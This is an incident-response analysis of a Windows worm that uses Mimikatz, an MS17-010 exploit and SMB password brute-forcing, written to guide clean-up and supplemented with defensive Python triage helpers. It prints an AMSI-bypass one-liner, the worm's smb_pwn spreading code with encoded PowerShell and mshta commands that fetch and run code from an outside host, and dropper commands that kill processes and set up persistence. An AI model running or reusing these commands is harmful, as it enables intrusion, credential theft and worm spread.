Incident Response Sample Analysis
You can just follow this analysis to do the clean-up; it isn't hard. Everything has been analysed, including the local files and part of the cloud-hosted samples. The virus itself isn't sophisticated; its most notable feature is the automated scanning attack. It uses cmd to open ports 65531, 65532 and 65533 as a marker of whether the machine has already been infected.
Analysing this sample requires some background on PowerShell deobfuscation first. The slides are at http://rvasec.com/slides/2017/Bohannon_Daniel--RVAsec_2017.pptx ; download the deck and study it.
1. What the PowerShell does.
It disables AMSI (the Antimalware Scan Interface) with:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
See https://www.anquanke.com/post/id/162924 for details.
What Get-Win32Types does: the analysis shows that this function uses PowerShell to build the PE file structures by hand. For example:
${TYpEBUiLdER} = ${MOdULEbUIldEr}.DefineEnum(('SubSystemType'), ('Public'), [UInt16])
${tyPeBuiLDEr}.DefineLiteral(('IMAGE_SUBSYSTEM_UNKNOWN'), [UInt16] 0) | Out-Null
${tYpEbUILdER}.DefineLiteral(('IMAGE_SUBSYSTEM_NATIVE'), [UInt16] 1) | Out-Null
${TypeBuILdER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_GUI'), [UInt16] 2) | Out-Null
${TYpeBuildER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_CUI'), [UInt16] 3) | Out-Null
${TYPebUiLDer}.DefineLiteral(('IMAGE_SUBSYSTEM_POSIX_CUI'), [UInt16] 7) | Out-Null
${TYPeBUiLDER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI'), [UInt16] 9) | Out-Null
${TyPebuILdEr}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_APPLICATION'), [UInt16] 10) | Out-Null
${TyPEbUIlDEr}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER'), [UInt16] 11) | Out-Null
${TypEBUiLdER}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER'), [UInt16] 12) | Out-Null
${tyPeBUiLDer}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_ROM'), [UInt16] 13) | Out-Null
${TyPebuIlDer}.DefineLiteral(('IMAGE_SUBSYSTEM_XBOX'), [UInt16] 14) | Out-Null
See https://docs.microsoft.com/en-us/windows/desktop/debug/pe-format for details; it is not covered further here.
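As an added example (not code from the post or from the script it analyses), here is a small Python reader for the same IMAGE_SUBSYSTEM values that Get-Win32Types defines, which shows what those hand-built structures let a reflective loader read out of a PE header. The header-only image it builds for the self-check is constructed here and is not a real binary; the offsets follow the standard PE layout from the Microsoft document linked above.

```python
"""Added example (not code from the post or from the script it analyses): a
minimal PE header reader that uses the same IMAGE_SUBSYSTEM_* values the
script's Get-Win32Types defines, to show what those hand-built structures
let a reflective loader read out of an image."""
import struct

IMAGE_SUBSYSTEM = {  # values exactly as in the script's DefineLiteral calls
    0: "IMAGE_SUBSYSTEM_UNKNOWN",
    1: "IMAGE_SUBSYSTEM_NATIVE",
    2: "IMAGE_SUBSYSTEM_WINDOWS_GUI",
    3: "IMAGE_SUBSYSTEM_WINDOWS_CUI",
    7: "IMAGE_SUBSYSTEM_POSIX_CUI",
    9: "IMAGE_SUBSYSTEM_WINDOWS_CE_GUI",
    10: "IMAGE_SUBSYSTEM_EFI_APPLICATION",
    11: "IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
    12: "IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER",
    13: "IMAGE_SUBSYSTEM_EFI_ROM",
    14: "IMAGE_SUBSYSTEM_XBOX",
}
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
SUBSYSTEM_OFFSET = 68   # same offset in PE32 and PE32+ optional headers


def pe_subsystem(data: bytes) -> dict:
    """Read machine, format, section count and subsystem from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC) or opt_size < SUBSYSTEM_OFFSET + 2:
        raise ValueError("unsupported optional header")
    (subsystem,) = struct.unpack_from("<H", data, opt + SUBSYSTEM_OFFSET)
    return {
        "machine": hex(machine),
        "format": "PE32+" if magic == PE32PLUS_MAGIC else "PE32",
        "sections": nsections,
        "subsystem": IMAGE_SUBSYSTEM.get(subsystem, f"unknown({subsystem})"),
    }


def looks_like_pe(data: bytes) -> bool:
    """True when the headers parse; handy for skipping non-PE files in triage."""
    try:
        pe_subsystem(data)
        return True
    except (ValueError, struct.error):
        return False


def build_stub_pe(subsystem: int, pe32plus: bool = True) -> bytes:
    """Construct a header-only image for the self-check (not a real binary)."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    opt_size = 240 if pe32plus else 224      # standard sizes with 16 data directories
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 1, 0, 0, 0, opt_size, 0x22)
    optional = bytearray(opt_size)
    struct.pack_into("<H", optional, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", optional, SUBSYSTEM_OFFSET, subsystem)
    return dos + b"PE\0\0" + coff + bytes(optional)


if __name__ == "__main__":
    print(pe_subsystem(build_stub_pe(3)))
    print(pe_subsystem(build_stub_pe(2, pe32plus=False)))
```

On a real dropped file you would pass `open(path, "rb").read()` to pe_subsystem; a console subsystem on a file that claims to be a Windows service binary is the kind of mismatch worth noting during triage.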
- Get-Win32Constants: sets the values for the PE structures just constructed.
- Get-Win32Functions: loads functions from system DLLs so that PowerShell can call system functions.
- Sub-SignedIntAsUnsigned: subtracts signed ints and converts the result to an unsigned int.
- Add-SignedIntAsUnsigned: adds signed ints and converts the result to an unsigned integer.
- Compare-Val1GreaterThanVal2AsUInt: compares two integers for equality.
- Convert-UIntToInt: converts an unsigned integer to a signed integer.
- Test-MemoryRangeValid: tests whether the requested memory region is usable.
- Write-BytesToMemory: writes bytes into memory.
- Get-ProcAddress: equivalent to calling GetProcAddress directly; retrieves the address of an exported function from the specified dynamic-link library (DLL).
- Enable-SeDebugPrivilege: enables the SeDebugPrivilege for the given process. After the PS file releases the mimikatz PE executable into memory, it enables SeDebugPrivilege on that released thread; otherwise mimikatz cannot run.
- Invoke-CreateRemoteThread: starts a thread in another process.
The remaining functions mostly retrieve the PE file headers, import table and export table.
The main function is simple and starts at line 2644. Its first few lines mainly decide which command to execute. The variable pebYtes64 holds mimikatz encoded in base64. It then checks computername and runs the code of the core functionality, REMOtEsCRiPTBlOCK, in either branch. I couldn't see any difference between the two.
The main function of the core REMOtEsCRiPTBlOCK is at line 2468. It injects mimikatz into the specified process and then runs mimikatz inside the injected process. I suspect the attacker found the script online, see https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 , and applied some simple obfuscation. You can see the obfuscation only turns keywords into string concatenations or mixed case; there are no substantive changes.
Harm done by this PowerShell:
- Reads system passwords, and any private keys the system may store, via mimikatz, to facilitate lateral movement
- Collects system information
Beyond that, the mimikatz released by this PowerShell file never touches disk; it runs only in memory and leaves no backdoor or the like.
2. svchost2.exe
Loading it into IDA, this exe does nothing but start something named Ddriver and then call the function signed int sub_40E8F0.
In that function it first calls sub_40E3D0, then sub_40D280, which writes the file C:\windows\temp\ttt.exe.

(figure: 40D280.png)
Back in sub_40E3D0, it executes:
cmd /c taskkill /f /im svhost.exe /im svhhost.exe /im svvhost.exe & move /y c:\windows\temp\svvhost.exe c:\windows\temp\svchost.exe & del c:\windows\system32\svhhost.exe & del c:\windows\syswow64\svhhost.exe

(figure: 40E3D0.png)
In other words, it calls taskkill to kill svhost and then deletes it. The correct name in Windows is svchost, so this is deliberately killing off competitors. It then moves c:\windows\temp\svvhost.exe to c:\windows\temp\svchost.exe, impersonating svchost. I'd suggest you think about how to handle this and just fix it. Next it also uses wmic to kill the svhhost process.
It runs the following cmd:
cmd /c wmic process where "ExecutablePath like '%%drivers%%' and name='taskmgr.exe'" delete & wmic process where "ExecutablePath like '%%drivers%%' and name='svchost.exe'" delete & wmic process where "ExecutablePath like '%%emp%%' and name='svchost.exe'" delete
This kills the Windows Task Manager and any svchost whose executable path is under drivers or temp, presumably to better hide the virus body.
It runs the following cmd:
cmd /c netsh interface ipv6 install&netsh firewall add portopening tcp 65532 UDP&netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53&netsh firewall add portopening tcp 65531 UDP2&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53&netsh firewall add portopening tcp 65533 ShareService
To explain: it first installs ipv6, then opens port 65532 in the firewall (the rule named UDP), then sets up v4tov4, i.e. an ipv4 port proxy; see https://www.cnblogs.com/xbblogs/p/7118203.html for details.
After that it sets up a bunch of miscellaneous things. I'd suggest you check in particular whether C:\windows\system32 contains a file named svhost; that one is the virus.
Then it creates a scheduled task. Here's the code; delete the task based on it:
cmd /c start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN %s /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN %s /tr "cmd.exe /c %s"&schtasks /run /TN %s
Then it sets a registry entry. Here's the location; just delete it: Software\Microsoft\Windows\CurrentVersion\Run . Check whether there is a suspicious key under that subkey; it should be Driver. Just delete it.
Back in sub_40E8F0, this mainly starts tasks and the like; see the figure, just delete them.

(figure: 40E8F0.png)
Harm done by svchost2:
- A pile of dropped files, registry modifications and scheduled tasks; deleting them is recommended
3. svchost1 analysis
This 8MB exe is obviously up to no good. Throwing it into IDA first, I noticed python strings. Checking the strings turned up py2exe, which means this exe was very likely written in Python and packaged as an exe. We can use the unpy2exe tool to recover the Python code, see https://github.com/matiasb/unpy2exe . Then just recover the PYC file.

(figure: 1.png)
Looking at the recovered file in vi, it is actually a Python script that scans for MS17-010.

(figure: 2.png)
The attachment is the recovered py file; py uploads aren't allowed, so I renamed it to txt. Download it and change the extension back to py.
The script first binds local port 60124. Presumably this acts as a mutex: only one instance of the scanner is allowed to run on the system.
The code starts at line 1090. It first checks whether the user k8h3d exists locally and deletes it if so. Then it sets up the scanning scheduled task. If the local machine is already infected it reads the local virus file; if not, it downloads the virus code from the cloud, and then prepares to spread.
First it checks whether the machine is domain-joined via wmic ntdomain get domainname . If it is, the domain username and password are added to the password-cracking list, which holds common weak passwords.
Then the findip function collects the host's IP, subnet and similar information. Next it calls the scansmb function, which calls scan2 to check whether the target has port 445 open. The virus opens port 65533, so if the scanned machine has 65533 open it has already been infected. After that it calls validate.
The main job of validate is to brute-force the SMB service with the weak-password table. If that succeeds, the scanner is copied to the attacked machine and executed.
def validate(ip):
    for u in userlist2:
        for p in passlist:
            if u == '' and p != '':
                continue
            for d in domainlist:
                if PSEXEC(ee2, dl, 'cmd.exe /c c:\\windows\\temp\\svchost.exe', u, p, d).run(ip):
                    print 'SMB Succ!'
                    return
That's one intrusion method. The second: after findip obtains the subnet IP information, it calls check_thread to attack with MS17-010. So you'll find this py code is really the Python version of the MS17-010 attack code, see https://github.com/worawit/MS17-010/blob/master/zzz_exploit.py
After a successful intrusion, it runs the code in the smb_pwn function on the target machine. I'll paste the attack code directly, so everyone can see how to deal with this virus:
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    if os.path.exists('c:/windows/system32/svhost.exe'):
        eb = 'c:\\windows\\system32\\svhost.exe'
    if os.path.exists('c:/windows/SysWOW64/svhost.exe'):
        eb = 'c:\\windows\\SysWOW64\\svhost.exe'
    if os.path.exists('c:/windows/system32/drivers/svchost.exe'):
        eb = 'c:\\windows\\system32\\drivers\\svchost.exe'
    if os.path.exists('c:/windows/SysWOW64/drivers/svchost.exe'):
        eb = 'c:\\windows\\SysWOW64\\drivers\\svchost.exe'
    service_exec(conn, 'cmd /c net share c$=c:')
    smb_send_file(smbConn, eb, 'c', '/installed.exe')
    if os.path.exists('c:/windows/temp/svvhost.exe'):
        ee = 'c:\\windows\\temp\\svvhost.exe'
    if os.path.exists('c:/windows/temp/svchost.exe'):
        ee = 'c:\\windows\\temp\\svchost.exe'
    smb_send_file(smbConn, ee, 'c', '/windows/temp/svchost.exe')
    bat = 'cmd /c c:\\installed.exe&c:\\installed.exe&echo c:\\installed.exe >c:/windows/temp/p.bat&echo c:\\windows\temp\\svchost.exe >>c:/windows/temp/p.bat&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2>>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2>>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"^&schtasks /run /TN Autocheck^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f%%i in (\'tasklist ^^^| find /c /i "cmd.exe"\'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo net user k8h3d /del >>c:/windows/temp/p.bat&echo del c:\\windows\\temp\\p.bat>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat'
    service_exec(conn, bat)
Harm:
1. Automated scanning attack, actively attacking other hosts on the local network
Now, how to remove this virus:
Look at the code in the smb_pwn function yourself and delete the corresponding dropped files.
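To make that check repeatable, here is an added Python triage helper (not code from the post; the worm's own code is what's pasted above). It takes the captured text of netstat -ano, schtasks /query /fo csv and netsh interface portproxy show all plus a list of existing paths, and reports which of the write-up's indicators (the marker ports, the 60124 mutex port, the Autocheck and Bluetooths tasks, the 1.1.1.1:53 port proxies and the drop paths from smb_pwn and svchost2) are present. The command output embedded below is constructed for the self-check, not captured from a real host.

```python
"""Added example (not part of the original post): offline triage for the host
artefacts this write-up attributes to the worm. It works on the captured text
of 'netstat -ano', 'schtasks /query /fo csv' and
'netsh interface portproxy show all' plus a list of existing paths, so it can
be checked anywhere; on a live host you feed it the real command output."""
import csv
import io
import re

# Indicators as given in the write-up: marker ports, drop paths, task names.
MARKER_PORTS = {65531, 65532, 65533}   # opened via netsh; 65533 = "already infected"
MUTEX_PORT = 60124                     # bound by the scanner as a single-instance lock
DROP_PATHS = {
    r"c:\windows\system32\svhost.exe",
    r"c:\windows\syswow64\svhost.exe",
    r"c:\windows\system32\drivers\svchost.exe",
    r"c:\windows\syswow64\drivers\svchost.exe",
    r"c:\windows\temp\svchost.exe",
    r"c:\windows\temp\svvhost.exe",
    r"c:\windows\temp\ttt.exe",
    r"c:\windows\temp\p.bat",
    r"c:\installed.exe",
}
TASK_NAMES = {"autocheck", r"microsoft\windows\bluetooths"}


def listening_marker_ports(netstat_text):
    """LISTENING ports from 'netstat -ano' that belong to the worm's port set."""
    found = set()
    for line in netstat_text.splitlines():
        m = re.match(r"\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING", line, re.I)
        if m and int(m.group(1)) in MARKER_PORTS | {MUTEX_PORT}:
            found.add(int(m.group(1)))
    return sorted(found)


def suspicious_tasks(schtasks_csv):
    """Task names from 'schtasks /query /fo csv' that match the worm's tasks."""
    return [row["TaskName"] for row in csv.DictReader(io.StringIO(schtasks_csv))
            if row.get("TaskName", "").lstrip("\\").lower() in TASK_NAMES]


def rogue_portproxies(portproxy_text):
    """(listen port, (target address, target port)) rows from the portproxy table."""
    hits = []
    for line in portproxy_text.splitlines():
        m = re.match(r"\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$", line)
        if m and int(m.group(2)) in MARKER_PORTS:
            hits.append((int(m.group(2)), (m.group(3), int(m.group(4)))))
    return hits


def present_drop_files(existing_paths):
    """Paths from any directory listing that match the worm's drop locations."""
    return sorted(p for p in existing_paths if p.lower() in DROP_PATHS)


def triage(netstat_text, schtasks_csv, portproxy_text, existing_paths):
    """One report of every indicator found; an empty dict means nothing matched."""
    report = {
        "ports": listening_marker_ports(netstat_text),
        "tasks": suspicious_tasks(schtasks_csv),
        "portproxy": rogue_portproxies(portproxy_text),
        "files": present_drop_files(existing_paths),
    }
    return {k: v for k, v in report.items() if v}


# Constructed command output for the self-check (not captured from a real host).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:60124          0.0.0.0:0              LISTENING       2412
  TCP    0.0.0.0:65533          0.0.0.0:0              LISTENING       2412
  TCP    10.0.0.5:49712         10.0.0.9:445           ESTABLISHED     2412
"""
SAMPLE_SCHTASKS = "\n".join([
    '"TaskName","Next Run Time","Status"',
    r'"\Autocheck","N/A","Ready"',
    r'"\Microsoft\Windows\Bluetooths","N/A","Ready"',
    r'"\Microsoft\Windows\Defrag\ScheduledDefrag","N/A","Ready"',
]) + "\n"
SAMPLE_PORTPROXY = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               65532       1.1.1.1         53
*               65531       1.1.1.1         53
"""
SAMPLE_FILES = [
    r"C:\Windows\System32\svchost.exe",   # the legitimate one, not an indicator
    r"C:\Windows\System32\svhost.exe",
    r"C:\Windows\Temp\ttt.exe",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_NETSTAT, SAMPLE_SCHTASKS, SAMPLE_PORTPROXY, SAMPLE_FILES).items():
        print(key, value)
```

The service Ddriver, the Run-key value Driver and the k8h3d account from the write-up are left to sc query, reg query and net user respectively, since their output is simpler to eyeball than to parse.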
Now for the cloud-hosted code. It first downloads PowerShell code from http://v.beahh.com/v . That code is encoded with gzinflate(base64_decode(...)), so I wrote a bit of PHP to decode it. The decoded content is as follows:
.( $Env:COMSpEc[4,15,25]-jOIn'')( ((("{4}{28}{19}{23}{15}{46}{38}{27}{56}{47}{10}{62}{35}{29}{59}{16}{60}{0}{34}{55}{37}{13}{57}{52}{6}{50}{18}{61}{2}{36}{43}{45}{53}{22}{26}{31}{51}{1}{49}{21}{20}{54}{14}{7}{5}{40}{17}{58}{25}{30}{3}{39}{42}{24}{63}{11}{44}{8}{41}{32}{48}{12}{9}{33}" -f'JUpnV+WdSzp2k+','fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolc','BPRvR//YReMbxC','L','Invoke-Expression {1}(New-','/w/yMT','34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuV','qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm','/','ion.CompressionMode]::Decompress)), [Text.Encoding]:','N9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1p','/S+/9/HW1p2','0})))), [IO.Compress','7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09','J5','rt]::Fr','qGf5dvaQPty6WRd2+5q+uqqf0+','3oIFNKv2ydf/ku','XbQYz6al',' IO.Compr','yR','yF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfEL','1/5z7Nz','ession.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Conve','a2sX8D7G85ra/OTrk/TLZ3d','bJHxfNOCQT9XqDQYvE','Thv','HYBxJliUmL23Ke39K9UrX4HShCIBgE','Object IO.StreamReader ({1}(New-Object','66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk16','1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfn','s9lqPfvpNf39CY8/bx9dLn','v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/X',':ASCII)).ReadToEnd(); 
','LS','22z6S/B7Xhbnab','nP1sltEHwo','np8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c','{0}7b0','dFtCgr2m','MPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ','n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8','q2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lt','EdZlG4HxOze4yoTHjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwX','Pf++PP','ILr168wx/lyO23','omBase64String(','51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvz','RUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv5N+P73zGyf/Dw=={','xR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTv','plY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9n','MZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8','Ht5ZLdrf','w160YCWiGvLS1dV50pG','Ihdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2g','7r/PV2m3++JXDu/R7Lqv','yTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O','aS7/','ny3PxvkiW47v','6','fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6nd','cX8ROj1mZkBQ4PdjTSgzjpkAE90+q','z/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P','TSGC2aPMLYCC82uE44StBTr+id8Jv'))-f[ChAR]39,[ChAR]36) )
Then, following a FireEye article explaining PowerShell obfuscation, I wrote the following py script to decode it:
s = """JUpnV+WdSzp2k+','fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolc','BPRvR//YReMbxC','L','Invoke-Expression {1}(New-','/w/yMT','34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuV','qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm','/','ion.CompressionMode]::Decompress)), [Text.Encoding]:','N9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1p','/S+/9/HW1p2','0})))), [IO.Compress','7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09','J5','rt]::Fr','qGf5dvaQPty6WRd2+5q+uqqf0+','3oIFNKv2ydf/ku','XbQYz6al',' IO.Compr','yR','yF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfEL','1/5z7Nz','ession.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Conve','a2sX8D7G85ra/OTrk/TLZ3d','bJHxfNOCQT9XqDQYvE','Thv','HYBxJliUmL23Ke39K9UrX4HShCIBgE','Object IO.StreamReader ({1}(New-Object','66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk16','1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfn','s9lqPfvpNf39CY8/bx9dLn','v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/X',':ASCII)).ReadToEnd(); 
','LS','22z6S/B7Xhbnab','nP1sltEHwo','np8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c','{0}7b0','dFtCgr2m','MPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ','n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8','q2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lt','EdZlG4HxOze4yoTHjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwX','Pf++PP','ILr168wx/lyO23','omBase64String(','51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvz','RUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv5N+P73zGyf/Dw=={','xR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTv','plY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9n','MZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8','Ht5ZLdrf','w160YCWiGvLS1dV50pG','Ihdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2g','7r/PV2m3++JXDu/R7Lqv','yTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O','aS7/','ny3PxvkiW47v','6','fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6nd','cX8ROj1mZkBQ4PdjTSgzjpkAE90+q','z/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P','TSGC2aPMLYCC82uE44StBTr+id8Jv"""
# split the -f argument list on the quote-comma-quote separators
s = s.split("','")
# the placeholder order from the format template, "{4}{28}{19}..."
a = ['4', '28', '19', '23', '15', '46', '38', '27', '56', '47', '10', '62', '35', '29', '59', '16', '60', '0', '34', '55', '37', '13', '57', '52', '6', '50', '18', '61', '2', '36', '43', '45', '53', '22', '26', '31', '51', '1', '49', '21', '20', '54', '14', '7', '5', '40', '17', '58', '25', '30', '3', '39', '42', '24', '63', '11', '44', '8', '41', '32', '48', '12', '9', '33']
result = ""
for i in a:
    result += s[int(i)]
print(result)
The result is:
Invoke-Expression {1}(New-Object IO.StreamReader ({1}(New-Object IO.Compression.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Convert]::FromBase64String({0}7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvzN9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1pz/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P22z6S/B7Xhbnab66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk166qGf5dvaQPty6WRd2+5q+uqqf0+fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6ndJUpnV+WdSzp2k+LS7r/PV2m3++JXDu/R7Lqvnp8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09aS7/Ht5ZLdrf34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuVplY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9nXbQYz6alcX8ROj1mZkBQ4PdjTSgzjpkAE90+qBPRvR//YReMbxCnP1sltEHwoEdZlG4HxOze4yoT